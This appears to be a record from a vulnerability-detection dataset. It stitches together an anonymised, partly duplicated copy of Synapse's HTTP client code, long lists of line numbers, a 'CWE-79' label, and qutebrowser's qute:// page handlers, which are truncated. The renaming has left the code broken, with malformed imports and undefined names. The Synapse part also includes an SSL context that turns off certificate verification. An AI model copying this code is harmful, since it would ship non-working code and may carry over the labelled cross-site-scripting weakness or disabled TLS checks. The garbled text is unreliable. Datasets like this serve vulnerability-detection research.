def FUNC_2(VAR_12: Failure):
if VAR_12.check(twisted_error.TimeoutError, twisted_error.ConnectingCancelledError):
raise RequestTimedOutError("Timeout connecting to remote server")
elif VAR_12.check(defer.TimeoutError, ResponseNeverReceived):
raise RequestTimedOutError("Timeout waiting for VAR_13 from remote server")
return VAR_12
class CLASS_3(protocol.Protocol):
def __init__(
self, VAR_14: BinaryIO, VAR_35: defer.Deferred, VAR_15: Optional[int]
):
self.stream = VAR_14
self.deferred = VAR_35
self.length = 0
self.max_size = VAR_15
def FUNC_14(self, VAR_30: bytes) -> None:
self.stream.write(VAR_30)
self.length += len(VAR_30)
if self.max_size is not None and self.length >= self.max_size:
self.deferred.errback(
SynapseError(
502,
"Requested file is too large > %VAR_41 bytes" % (self.max_size,),
Codes.TOO_LARGE,
)
)
self.deferred = defer.Deferred()
self.transport.loseConnection()
def FUNC_15(self, VAR_36: Failure) -> None:
if VAR_36.check(ResponseDone):
self.deferred.callback(self.length)
elif VAR_36.check(PotentialDataLoss):
self.deferred.callback(self.length)
else:
self.deferred.errback(VAR_36)
def FUNC_3(
VAR_13: IResponse, VAR_14: BinaryIO, VAR_15: Optional[int]
) -> defer.Deferred:
VAR_37 = defer.Deferred()
VAR_13.deliverBody(CLASS_3(VAR_14, VAR_37, VAR_15))
return VAR_37
def FUNC_4(VAR_16: Optional[Mapping[str, Union[str, List[str]]]]) -> bytes:
if VAR_16 is None:
return b""
VAR_38 = {}
for VAR_50, VAR_57 in VAR_16.items():
if isinstance(VAR_57, str):
VAR_57 = [vs]
VAR_38[VAR_50] = [v.encode("utf8") for v in VAR_57]
VAR_39 = urllib.parse.urlencode(VAR_38, True)
return VAR_39.encode("utf8")
class CLASS_4(ssl.ContextFactory):
def __init__(self):
self._context = SSL.Context(SSL.SSLv23_METHOD)
self._context.set_verify(VERIFY_NONE, lambda *_: None)
def FUNC_16(self, VAR_19=None, VAR_40=None):
return self._context
def FUNC_17(self, VAR_19, VAR_40):
return self
|
import logging
import .urllib.parse
from io import BytesIO
from typing import (
TYPE_CHECKING,
Any,
BinaryIO,
Dict,
Iterable,
List,
Mapping,
Optional,
Sequence,
Tuple,
Union,
)
import treq
from canonicaljson import .encode_canonical_json
from netaddr import IPAddress, IPSet
from prometheus_client import Counter
from zope.interface import implementer, provider
from OpenSSL import SSL
from OpenSSL.SSL import VERIFY_NONE
from twisted.internet import .defer, error as twisted_error, protocol, ssl
from twisted.internet.interfaces import (
IAddress,
IHostResolution,
IReactorPluggableNameResolver,
IResolutionReceiver,
)
from twisted.internet.task import Cooperator
from twisted.python.failure import Failure
from twisted.web._newclient import ResponseDone
from twisted.web.client import (
Agent,
HTTPConnectionPool,
ResponseNeverReceived,
readBody,
)
from twisted.web.http import PotentialDataLoss
from twisted.web.http_headers import Headers
from twisted.web.iweb import IAgent, IBodyProducer, IResponse
from synapse.api.errors import Codes, HttpResponseException, SynapseError
from synapse.http import QuieterFileBodyProducer, RequestTimedOutError, redact_uri
from synapse.http.proxyagent import ProxyAgent
from synapse.logging.context import make_deferred_yieldable
from synapse.logging.opentracing import set_tag, start_active_span, tags
from synapse.util import json_decoder
from synapse.util.async_helpers import timeout_deferred
if TYPE_CHECKING:
from synapse.app.homeserver import HomeServer
VAR_0 = logging.getLogger(__name__)
VAR_1 = Counter("synapse_http_client_requests", "", ["method"])
VAR_2 = Counter(
"synapse_http_client_responses", "", ["method", "code"]
)
VAR_3 = Union[Mapping[str, "RawHeaderValue"], Mapping[bytes, "RawHeaderValue"]]
VAR_4 = Sequence[Union[str, bytes]]
VAR_5 = Union[str, bytes, Iterable[Union[str, bytes]]]
VAR_6 = Union[Mapping[str, VAR_5], Mapping[bytes, VAR_5]]
def FUNC_0(
VAR_7: IPAddress, VAR_8: Optional[IPSet], VAR_9: IPSet
) -> bool:
if VAR_7 in VAR_9:
if VAR_8 is None or VAR_7 not in VAR_8:
return True
return False
VAR_10 = 0.00000001
def FUNC_1(VAR_11):
def FUNC_5(VAR_17):
return VAR_11.callLater(VAR_10, VAR_17)
return FUNC_5
class CLASS_0:
def __init__(
self,
VAR_11: IReactorPluggableNameResolver,
VAR_8: Optional[IPSet],
VAR_9: IPSet,
):
self._reactor = VAR_11
self._ip_whitelist = VAR_8
self._ip_blacklist = VAR_9
def FUNC_6(
self, VAR_18: IResolutionReceiver, VAR_19: str, VAR_20: int = 0
) -> IResolutionReceiver:
VAR_42 = VAR_18()
VAR_43 = [] # type: List[IAddress]
def FUNC_18() -> None:
VAR_42.resolutionBegan(None)
VAR_52 = False
for i in VAR_43:
VAR_7 = IPAddress(i.host)
if FUNC_0(
VAR_7, self._ip_whitelist, self._ip_blacklist
):
VAR_0.info(
"Dropped %s from DNS resolution to %s due to blacklist"
% (VAR_7, VAR_19)
)
VAR_52 = True
if not VAR_52:
for i in VAR_43:
VAR_42.addressResolved(i)
VAR_42.resolutionComplete()
@provider(IResolutionReceiver)
class CLASS_6:
@staticmethod
def FUNC_19(VAR_53: IHostResolution) -> None:
pass
@staticmethod
def FUNC_20(VAR_54: IAddress) -> None:
VAR_43.append(VAR_54)
@staticmethod
def FUNC_21() -> None:
FUNC_18()
self._reactor.nameResolver.resolveHostName(
CLASS_6, VAR_19, VAR_20=portNumber
)
return VAR_42
@implementer(IReactorPluggableNameResolver)
class CLASS_1:
def __init__(
self,
VAR_11: IReactorPluggableNameResolver,
VAR_8: Optional[IPSet],
VAR_9: IPSet,
):
self._reactor = VAR_11
self._nameResolver = CLASS_0(
self._reactor, VAR_8, VAR_9
)
def __getattr__(self, VAR_21: str) -> Any:
if VAR_21 == "nameResolver":
return self._nameResolver
else:
return getattr(self._reactor, VAR_21)
class CLASS_2(Agent):
def __init__(
self,
VAR_22: IAgent,
VAR_8: Optional[IPSet] = None,
VAR_9: Optional[IPSet] = None,
):
self._agent = VAR_22
self._ip_whitelist = VAR_8
self._ip_blacklist = VAR_9
def FUNC_7(
self,
VAR_23: bytes,
VAR_24: bytes,
VAR_25: Optional[Headers] = None,
VAR_26: Optional[IBodyProducer] = None,
) -> defer.Deferred:
VAR_44 = urllib.parse.urlparse(VAR_24.decode("ascii"))
try:
VAR_7 = IPAddress(VAR_44.hostname)
if FUNC_0(
VAR_7, self._ip_whitelist, self._ip_blacklist
):
VAR_0.info("Blocking access to %s due to blacklist" % (VAR_7,))
VAR_57 = SynapseError(403, "IP VAR_54 blocked by IP blacklist entry")
return defer.fail(Failure(VAR_57))
except Exception:
pass
return self._agent.request(
VAR_23, VAR_24, VAR_25=headers, VAR_26=bodyProducer
)
class CLASS_3:
def __init__(
self,
VAR_27: "HomeServer",
VAR_28: Dict[str, Any] = {},
VAR_8: Optional[IPSet] = None,
VAR_9: Optional[IPSet] = None,
VAR_29: Optional[bytes] = None,
VAR_30: Optional[bytes] = None,
):
self.hs = VAR_27
self._ip_whitelist = VAR_8
self._ip_blacklist = VAR_9
self._extra_treq_args = VAR_28
self.user_agent = VAR_27.version_string
self.clock = VAR_27.get_clock()
if VAR_27.config.user_agent_suffix:
self.user_agent = "%s %s" % (self.user_agent, VAR_27.config.user_agent_suffix)
self._cooperator = Cooperator(scheduler=FUNC_1(VAR_27.get_reactor()))
self.user_agent = self.user_agent.encode("ascii")
if self._ip_blacklist:
self.reactor = CLASS_1(
VAR_27.get_reactor(), self._ip_whitelist, self._ip_blacklist
)
else:
self.reactor = VAR_27.get_reactor()
VAR_45 = HTTPConnectionPool(self.reactor)
VAR_45.maxPersistentPerHost = max((100 * VAR_27.config.caches.global_factor, 5))
VAR_45.cachedConnectionTimeout = 2 * 60
self.agent = ProxyAgent(
self.reactor,
connectTimeout=15,
contextFactory=self.hs.get_http_client_context_factory(),
VAR_45=pool,
VAR_29=http_proxy,
VAR_30=https_proxy,
)
if self._ip_blacklist:
self.agent = CLASS_2(
self.agent,
VAR_8=self._ip_whitelist,
VAR_9=self._ip_blacklist,
)
async def FUNC_7(
self,
VAR_23: str,
VAR_24: str,
VAR_31: Optional[bytes] = None,
VAR_25: Optional[Headers] = None,
) -> IResponse:
VAR_1.labels(VAR_23).inc()
VAR_0.debug("Sending FUNC_7 %s %s", VAR_23, redact_uri(VAR_24))
with start_active_span(
"outgoing-client-request",
tags={
tags.SPAN_KIND: tags.SPAN_KIND_RPC_CLIENT,
tags.HTTP_METHOD: VAR_23,
tags.HTTP_URL: VAR_24,
},
finish_on_close=True,
):
try:
VAR_58 = None
if VAR_31 is not None:
VAR_58 = QuieterFileBodyProducer(
BytesIO(VAR_31), cooperator=self._cooperator,
)
VAR_59 = treq.request(
VAR_23,
VAR_24,
VAR_22=self.agent,
VAR_31=VAR_58,
VAR_25=headers,
**self._extra_treq_args,
) # type: defer.Deferred
VAR_59 = timeout_deferred(
VAR_59, 60, self.hs.get_reactor(),
)
VAR_59.addErrback(FUNC_2)
VAR_13 = await make_deferred_yieldable(VAR_59)
VAR_2.labels(VAR_23, VAR_13.code).inc()
VAR_0.info(
"Received VAR_13 to %s %s: %s",
VAR_23,
redact_uri(VAR_24),
VAR_13.code,
)
return VAR_13
except Exception as VAR_57:
VAR_2.labels(VAR_23, "ERR").inc()
VAR_0.info(
"Error sending FUNC_7 to %s %s: %s %s",
VAR_23,
redact_uri(VAR_24),
type(VAR_57).__name__,
VAR_57.args[0],
)
set_tag(tags.ERROR, True)
set_tag("error_reason", VAR_57.args[0])
raise
async def FUNC_8(
self,
VAR_24: str,
VAR_16: Optional[Mapping[str, Union[str, List[str]]]] = None,
VAR_25: Optional[VAR_3] = None,
) -> Any:
VAR_0.debug("post_urlencoded_get_json VAR_16: %s", VAR_16)
VAR_46 = FUNC_4(VAR_16)
VAR_47 = {
b"Content-Type": [b"application/VAR_17-www-form-urlencoded"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if VAR_25:
VAR_47.update(VAR_25) # type: ignore
VAR_13 = await self.request(
"POST", VAR_24, VAR_25=Headers(VAR_47), VAR_31=VAR_46
)
VAR_48 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return json_decoder.decode(VAR_48.decode("utf-8"))
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_48
)
async def FUNC_9(
self, VAR_24: str, VAR_32: Any, VAR_25: Optional[VAR_3] = None
) -> Any:
VAR_49 = encode_canonical_json(VAR_32)
VAR_0.debug("HTTP POST %s -> %s", VAR_49, VAR_24)
VAR_47 = {
b"Content-Type": [b"application/json"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if VAR_25:
VAR_47.update(VAR_25) # type: ignore
VAR_13 = await self.request(
"POST", VAR_24, VAR_25=Headers(VAR_47), VAR_31=VAR_49
)
VAR_48 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return json_decoder.decode(VAR_48.decode("utf-8"))
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_48
)
async def FUNC_10(
self,
VAR_24: str,
VAR_16: Optional[VAR_6] = None,
VAR_25: Optional[VAR_3] = None,
) -> Any:
VAR_47 = {b"Accept": [b"application/json"]}
if VAR_25:
VAR_47.update(VAR_25) # type: ignore
VAR_48 = await self.get_raw(VAR_24, VAR_16, VAR_25=headers)
return json_decoder.decode(VAR_48.decode("utf-8"))
async def FUNC_11(
self,
VAR_24: str,
VAR_33: Any,
VAR_16: Optional[VAR_6] = None,
VAR_25: VAR_3 = None,
) -> Any:
if VAR_16:
VAR_40 = urllib.parse.urlencode(VAR_16, True)
VAR_24 = "%s?%s" % (VAR_24, VAR_40)
VAR_49 = encode_canonical_json(VAR_33)
VAR_47 = {
b"Content-Type": [b"application/json"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if VAR_25:
VAR_47.update(VAR_25) # type: ignore
VAR_13 = await self.request(
"PUT", VAR_24, VAR_25=Headers(VAR_47), VAR_31=VAR_49
)
VAR_48 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return json_decoder.decode(VAR_48.decode("utf-8"))
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_48
)
async def FUNC_12(
self,
VAR_24: str,
VAR_16: Optional[VAR_6] = None,
VAR_25: Optional[VAR_3] = None,
) -> bytes:
if VAR_16:
VAR_40 = urllib.parse.urlencode(VAR_16, True)
VAR_24 = "%s?%s" % (VAR_24, VAR_40)
VAR_47 = {b"User-Agent": [self.user_agent]}
if VAR_25:
VAR_47.update(VAR_25) # type: ignore
VAR_13 = await self.request("GET", VAR_24, VAR_25=Headers(VAR_47))
VAR_48 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return VAR_48
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_48
)
async def FUNC_13(
self,
VAR_34: str,
VAR_35: BinaryIO,
VAR_15: Optional[int] = None,
VAR_25: Optional[VAR_3] = None,
) -> Tuple[int, Dict[bytes, List[bytes]], str, int]:
VAR_47 = {b"User-Agent": [self.user_agent]}
if VAR_25:
VAR_47.update(VAR_25) # type: ignore
VAR_13 = await self.request("GET", VAR_34, VAR_25=Headers(VAR_47))
VAR_50 = dict(VAR_13.headers.getAllRawHeaders())
if (
b"Content-Length" in VAR_50
and VAR_15
and int(VAR_50[b"Content-Length"][0]) > VAR_15
):
VAR_0.warning("Requested URL is too large > %VAR_42 bytes" % (VAR_15,))
raise SynapseError(
502,
"Requested file is too large > %VAR_42 bytes" % (VAR_15,),
Codes.TOO_LARGE,
)
if VAR_13.code > 299:
VAR_0.warning("Got %VAR_38 when downloading %s" % (VAR_13.code, VAR_34))
raise SynapseError(502, "Got error %d" % (VAR_13.code,), Codes.UNKNOWN)
try:
VAR_55 = await make_deferred_yieldable(
FUNC_3(VAR_13, VAR_35, VAR_15)
)
except SynapseError:
raise
except Exception as VAR_57:
raise SynapseError(502, ("Failed to download remote VAR_48: %s" % VAR_57)) from VAR_57
return (
VAR_55,
VAR_50,
VAR_13.request.absoluteURI.decode("ascii"),
VAR_13.code,
)
def FUNC_2(VAR_12: Failure):
if VAR_12.check(twisted_error.TimeoutError, twisted_error.ConnectingCancelledError):
raise RequestTimedOutError("Timeout connecting to remote server")
elif VAR_12.check(defer.TimeoutError, ResponseNeverReceived):
raise RequestTimedOutError("Timeout waiting for VAR_13 from remote server")
return VAR_12
class CLASS_4(protocol.Protocol):
def __init__(
self, VAR_14: BinaryIO, VAR_36: defer.Deferred, VAR_15: Optional[int]
):
self.stream = VAR_14
self.deferred = VAR_36
self.length = 0
self.max_size = VAR_15
def FUNC_14(self, VAR_31: bytes) -> None:
self.stream.write(VAR_31)
self.length += len(VAR_31)
if self.max_size is not None and self.length >= self.max_size:
self.deferred.errback(
SynapseError(
502,
"Requested file is too large > %VAR_42 bytes" % (self.max_size,),
Codes.TOO_LARGE,
)
)
self.deferred = defer.Deferred()
self.transport.loseConnection()
def FUNC_15(self, VAR_37: Failure) -> None:
if VAR_37.check(ResponseDone):
self.deferred.callback(self.length)
elif VAR_37.check(PotentialDataLoss):
self.deferred.callback(self.length)
else:
self.deferred.errback(VAR_37)
def FUNC_3(
VAR_13: IResponse, VAR_14: BinaryIO, VAR_15: Optional[int]
) -> defer.Deferred:
VAR_38 = defer.Deferred()
VAR_13.deliverBody(CLASS_4(VAR_14, VAR_38, VAR_15))
return VAR_38
def FUNC_4(VAR_16: Optional[Mapping[str, Union[str, List[str]]]]) -> bytes:
if VAR_16 is None:
return b""
VAR_39 = {}
for VAR_51, VAR_56 in VAR_16.items():
if isinstance(VAR_56, str):
VAR_56 = [vs]
VAR_39[VAR_51] = [v.encode("utf8") for v in VAR_56]
VAR_40 = urllib.parse.urlencode(VAR_39, True)
return VAR_40.encode("utf8")
class CLASS_5(ssl.ContextFactory):
def __init__(self):
self._context = SSL.Context(SSL.SSLv23_METHOD)
self._context.set_verify(VERIFY_NONE, lambda *_: None)
def FUNC_16(self, VAR_19=None, VAR_41=None):
return self._context
def FUNC_17(self, VAR_19, VAR_41):
return self
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
32,
38,
60,
68,
71,
73,
78,
79,
80,
81,
83,
84,
85,
87,
88,
91,
92,
98,
103,
111,
112,
114,
115,
118,
121,
124,
126,
127,
133,
149,
153,
156,
159,
163,
172,
173,
174,
175,
180,
186,
190,
194,
198,
200,
201,
207,
223,
232,
235,
243,
245,
249,
250,
256,
278,
282,
287,
288,
289,
291,
293,
296,
297,
301,
309,
313,
314,
315,
316,
318,
319,
320,
323,
332,
334,
335,
336,
342,
356,
359,
362,
365,
366,
368,
384,
393,
394,
395,
399,
400,
402,
404,
425,
437,
440,
445,
447,
450,
451,
453,
455,
463,
467,
469,
476,
481,
486,
489,
494,
496,
500,
502,
510,
514,
516,
523,
531,
542,
544,
550,
553,
562,
574,
576,
582,
584,
592,
596,
598,
605,
613,
625,
631,
635,
637,
639,
646,
647,
648,
649,
665,
670,
674,
678,
680,
682,
694,
698,
699,
700,
701,
702,
708,
712,
719,
720,
723,
724,
727,
729,
731,
732,
741,
755,
760,
761,
765,
766,
772,
777,
781,
785,
786,
790,
793,
799,
805,
807,
809,
810,
814,
817,
821,
824,
827,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
106,
117,
118,
119,
120,
129,
130,
131,
132,
203,
204,
205,
206,
252,
253,
254,
255,
770,
771,
772,
773,
774,
775,
776,
777,
778,
779,
780,
788,
789,
790,
791,
792,
793,
794,
795,
796,
812,
813,
814,
815,
816,
140,
141,
142,
143,
144,
145,
214,
215,
216,
217,
218,
219,
266,
267,
268,
269,
270,
271,
272,
273,
274,
275,
276,
350,
351,
352,
353,
354,
355,
356,
357,
358,
359,
360,
361,
362,
363,
432,
433,
434,
435,
436,
437,
438,
439,
440,
441,
442,
443,
444,
445,
446,
447,
448,
449,
480,
481,
482,
483,
484,
485,
486,
487,
488,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
530,
531,
532,
533,
534,
535,
536,
537,
538,
539,
540,
541,
542,
543,
544,
545,
546,
561,
562,
563,
564,
565,
566,
567,
568,
569,
570,
571,
572,
573,
574,
575,
576,
577,
578,
612,
613,
614,
615,
616,
617,
618,
619,
620,
621,
622,
623,
624,
625,
626,
627,
657,
658,
659,
660,
661,
662,
663,
664,
665,
666,
667,
668,
669,
670,
671,
672,
673
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
32,
38,
60,
68,
71,
73,
78,
79,
80,
81,
83,
84,
85,
87,
88,
91,
92,
98,
103,
111,
112,
114,
115,
118,
121,
124,
126,
127,
133,
149,
153,
156,
159,
163,
172,
173,
174,
175,
180,
186,
190,
194,
198,
200,
201,
208,
216,
217,
218,
222,
224,
229,
230,
236,
252,
261,
264,
272,
274,
278,
279,
285,
307,
311,
316,
317,
318,
320,
322,
324,
325,
331,
332,
333,
334,
336,
337,
338,
341,
350,
352,
353,
354,
360,
374,
377,
380,
383,
384,
386,
402,
411,
412,
413,
417,
418,
420,
422,
443,
455,
458,
463,
465,
468,
469,
471,
473,
481,
485,
487,
494,
499,
504,
507,
512,
514,
518,
520,
528,
532,
534,
541,
549,
560,
562,
568,
571,
580,
592,
594,
600,
602,
610,
614,
616,
623,
631,
643,
649,
653,
655,
657,
664,
665,
666,
667,
683,
688,
692,
696,
698,
700,
712,
716,
717,
718,
719,
720,
726,
730,
737,
738,
741,
742,
745,
747,
749,
750,
759,
773,
778,
779,
783,
784,
790,
795,
799,
803,
804,
808,
811,
817,
823,
825,
827,
828,
832,
835,
839,
842,
845,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
106,
117,
118,
119,
120,
129,
130,
131,
132,
204,
205,
206,
207,
232,
233,
234,
235,
281,
282,
283,
284,
788,
789,
790,
791,
792,
793,
794,
795,
796,
797,
798,
806,
807,
808,
809,
810,
811,
812,
813,
814,
830,
831,
832,
833,
834,
140,
141,
142,
143,
144,
145,
243,
244,
245,
246,
247,
248,
295,
296,
297,
298,
299,
300,
301,
302,
303,
304,
305,
368,
369,
370,
371,
372,
373,
374,
375,
376,
377,
378,
379,
380,
381,
450,
451,
452,
453,
454,
455,
456,
457,
458,
459,
460,
461,
462,
463,
464,
465,
466,
467,
498,
499,
500,
501,
502,
503,
504,
505,
506,
507,
508,
509,
510,
511,
512,
513,
514,
515,
516,
548,
549,
550,
551,
552,
553,
554,
555,
556,
557,
558,
559,
560,
561,
562,
563,
564,
579,
580,
581,
582,
583,
584,
585,
586,
587,
588,
589,
590,
591,
592,
593,
594,
595,
596,
630,
631,
632,
633,
634,
635,
636,
637,
638,
639,
640,
641,
642,
643,
644,
645,
675,
676,
677,
678,
679,
680,
681,
682,
683,
684,
685,
686,
687,
688,
689,
690,
691
] |
1CWE-79
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2016-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Backend-independent qute://* code.
Module attributes:
pyeval_output: The output of the last :pyeval command.
_HANDLERS: The handlers registered via decorators.
"""
import json
import os
import time
import textwrap
import mimetypes
import urllib
import collections
import pkg_resources
import sip
from PyQt5.QtCore import QUrlQuery, QUrl
import qutebrowser
from qutebrowser.config import config, configdata, configexc, configdiff
from qutebrowser.utils import (version, utils, jinja, log, message, docutils,
objreg, urlutils)
from qutebrowser.misc import objects
pyeval_output = ":pyeval was never called"
spawn_output = ":spawn was never called"
_HANDLERS = {}
class NoHandlerFound(Exception):
"""Raised when no handler was found for the given URL."""
pass
class QuteSchemeOSError(Exception):
"""Called when there was an OSError inside a handler."""
pass
class QuteSchemeError(Exception):
"""Exception to signal that a handler should return an ErrorReply.
Attributes correspond to the arguments in
networkreply.ErrorNetworkReply.
Attributes:
errorstring: Error string to print.
error: Numerical error value.
"""
def __init__(self, errorstring, error):
self.errorstring = errorstring
self.error = error
super().__init__(errorstring)
class Redirect(Exception):
"""Exception to signal a redirect should happen.
Attributes:
url: The URL to redirect to, as a QUrl.
"""
def __init__(self, url):
super().__init__(url.toDisplayString())
self.url = url
class add_handler: # noqa: N801,N806 pylint: disable=invalid-name
"""Decorator to register a qute://* URL handler.
Attributes:
_name: The 'foo' part of qute://foo
backend: Limit which backends the handler can run with.
"""
def __init__(self, name, backend=None):
self._name = name
self._backend = backend
self._function = None
def __call__(self, function):
self._function = function
_HANDLERS[self._name] = self.wrapper
return function
def wrapper(self, *args, **kwargs):
"""Call the underlying function."""
if self._backend is not None and objects.backend != self._backend:
return self.wrong_backend_handler(*args, **kwargs)
else:
return self._function(*args, **kwargs)
def wrong_backend_handler(self, url):
"""Show an error page about using the invalid backend."""
html = jinja.render('error.html',
title="Error while opening qute://url",
url=url.toDisplayString(),
error='{} is not available with this '
'backend'.format(url.toDisplayString()))
return 'text/html', html
def data_for_url(url):
"""Get the data to show for the given URL.
Args:
url: The QUrl to show.
Return:
A (mimetype, data) tuple.
"""
norm_url = url.adjusted(QUrl.NormalizePathSegments |
QUrl.StripTrailingSlash)
if norm_url != url:
raise Redirect(norm_url)
path = url.path()
host = url.host()
query = urlutils.query_string(url)
# A url like "qute:foo" is split as "scheme:path", not "scheme:host".
log.misc.debug("url: {}, path: {}, host {}".format(
url.toDisplayString(), path, host))
if not path or not host:
new_url = QUrl()
new_url.setScheme('qute')
# When path is absent, e.g. qute://help (with no trailing slash)
if host:
new_url.setHost(host)
# When host is absent, e.g. qute:help
else:
new_url.setHost(path)
new_url.setPath('/')
if query:
new_url.setQuery(query)
if new_url.host(): # path was a valid host
raise Redirect(new_url)
try:
handler = _HANDLERS[host]
except KeyError:
raise NoHandlerFound(url)
try:
mimetype, data = handler(url)
except OSError as e:
# FIXME:qtwebengine how to handle this?
raise QuteSchemeOSError(e)
except QuteSchemeError:
raise
assert mimetype is not None, url
if mimetype == 'text/html' and isinstance(data, str):
# We let handlers return HTML as text
data = data.encode('utf-8', errors='xmlcharrefreplace')
return mimetype, data
@add_handler('bookmarks')
def qute_bookmarks(_url):
"""Handler for qute://bookmarks. Display all quickmarks / bookmarks."""
bookmarks = sorted(objreg.get('bookmark-manager').marks.items(),
key=lambda x: x[1]) # Sort by title
quickmarks = sorted(objreg.get('quickmark-manager').marks.items(),
key=lambda x: x[0]) # Sort by name
html = jinja.render('bookmarks.html',
title='Bookmarks',
bookmarks=bookmarks,
quickmarks=quickmarks)
return 'text/html', html
@add_handler('tabs')
def qute_tabs(_url):
"""Handler for qute://tabs. Display information about all open tabs."""
tabs = collections.defaultdict(list)
for win_id, window in objreg.window_registry.items():
if sip.isdeleted(window):
continue
tabbed_browser = objreg.get('tabbed-browser',
scope='window',
window=win_id)
for tab in tabbed_browser.widgets():
if tab.url() not in [QUrl("qute://tabs/"), QUrl("qute://tabs")]:
urlstr = tab.url().toDisplayString()
tabs[str(win_id)].append((tab.title(), urlstr))
html = jinja.render('tabs.html',
title='Tabs',
tab_list_by_window=tabs)
return 'text/html', html
def history_data(start_time, offset=None):
"""Return history data.
Arguments:
start_time: select history starting from this timestamp.
offset: number of items to skip
"""
# history atimes are stored as ints, ensure start_time is not a float
start_time = int(start_time)
hist = objreg.get('web-history')
if offset is not None:
entries = hist.entries_before(start_time, limit=1000, offset=offset)
else:
# end is 24hrs earlier than start
end_time = start_time - 24*60*60
entries = hist.entries_between(end_time, start_time)
return [{"url": e.url, "title": e.title or e.url, "time": e.atime}
for e in entries]
@add_handler('history')
def qute_history(url):
"""Handler for qute://history. Display and serve history."""
if url.path() == '/data':
try:
offset = QUrlQuery(url).queryItemValue("offset")
offset = int(offset) if offset else None
except ValueError as e:
raise QuteSchemeError("Query parameter offset is invalid", e)
# Use start_time in query or current time.
try:
start_time = QUrlQuery(url).queryItemValue("start_time")
start_time = float(start_time) if start_time else time.time()
except ValueError as e:
raise QuteSchemeError("Query parameter start_time is invalid", e)
return 'text/html', json.dumps(history_data(start_time, offset))
else:
return 'text/html', jinja.render(
'history.html',
title='History',
gap_interval=config.val.history_gap_interval
)
@add_handler('javascript')
def qute_javascript(url):
"""Handler for qute://javascript.
Return content of file given as query parameter.
"""
path = url.path()
if path:
path = "javascript" + os.sep.join(path.split('/'))
return 'text/html', utils.read_file(path, binary=False)
else:
raise QuteSchemeError("No file specified", ValueError())
@add_handler('pyeval')
def qute_pyeval(_url):
"""Handler for qute://pyeval."""
html = jinja.render('pre.html', title='pyeval', content=pyeval_output)
return 'text/html', html
@add_handler('spawn-output')
def qute_spawn_output(_url):
"""Handler for qute://spawn-output."""
html = jinja.render('pre.html', title='spawn output', content=spawn_output)
return 'text/html', html
@add_handler('version')
@add_handler('verizon')
def qute_version(_url):
"""Handler for qute://version."""
html = jinja.render('version.html', title='Version info',
version=version.version(),
copyright=qutebrowser.__copyright__)
return 'text/html', html
@add_handler('plainlog')
def qute_plainlog(url):
"""Handler for qute://plainlog.
An optional query parameter specifies the minimum log level to print.
For example, qute://log?level=warning prints warnings and errors.
Level can be one of: vdebug, debug, info, warning, error, critical.
"""
if log.ram_handler is None:
text = "Log output was disabled."
else:
level = QUrlQuery(url).queryItemValue('level')
if not level:
level = 'vdebug'
text = log.ram_handler.dump_log(html=False, level=level)
html = jinja.render('pre.html', title='log', content=text)
return 'text/html', html
@add_handler('log')
def qute_log(url):
"""Handler for qute://log.
An optional query parameter specifies the minimum log level to print.
For example, qute://log?level=warning prints warnings and errors.
Level can be one of: vdebug, debug, info, warning, error, critical.
"""
if log.ram_handler is None:
html_log = None
else:
level = QUrlQuery(url).queryItemValue('level')
if not level:
level = 'vdebug'
html_log = log.ram_handler.dump_log(html=True, level=level)
html = jinja.render('log.html', title='log', content=html_log)
return 'text/html', html
@add_handler('gpl')
def qute_gpl(_url):
"""Handler for qute://gpl. Return HTML content as string."""
return 'text/html', utils.read_file('html/license.html')
@add_handler('help')
def qute_help(url):
"""Handler for qute://help."""
urlpath = url.path()
if not urlpath or urlpath == '/':
urlpath = 'index.html'
else:
urlpath = urlpath.lstrip('/')
if not docutils.docs_up_to_date(urlpath):
message.error("Your documentation is outdated! Please re-run "
"scripts/asciidoc2html.py.")
path = 'html/doc/{}'.format(urlpath)
if not urlpath.endswith('.html'):
try:
bdata = utils.read_file(path, binary=True)
except OSError as e:
raise QuteSchemeOSError(e)
mimetype, _encoding = mimetypes.guess_type(urlpath)
assert mimetype is not None, url
return mimetype, bdata
try:
data = utils.read_file(path)
except OSError:
# No .html around, let's see if we find the asciidoc
asciidoc_path = path.replace('.html', '.asciidoc')
if asciidoc_path.startswith('html/doc/'):
asciidoc_path = asciidoc_path.replace('html/doc/', '../doc/help/')
try:
asciidoc = utils.read_file(asciidoc_path)
except OSError:
asciidoc = None
if asciidoc is None:
raise
preamble = textwrap.dedent("""
There was an error loading the documentation!
This most likely means the documentation was not generated
properly. If you are running qutebrowser from the git repository,
please (re)run scripts/asciidoc2html.py and reload this page.
If you're running a released version this is a bug, please use
:report to report it.
Falling back to the plaintext version.
---------------------------------------------------------------
""")
return 'text/plain', (preamble + asciidoc).encode('utf-8')
else:
return 'text/html', data
@add_handler('backend-warning')
def qute_backend_warning(_url):
"""Handler for qute://backend-warning."""
html = jinja.render('backend-warning.html',
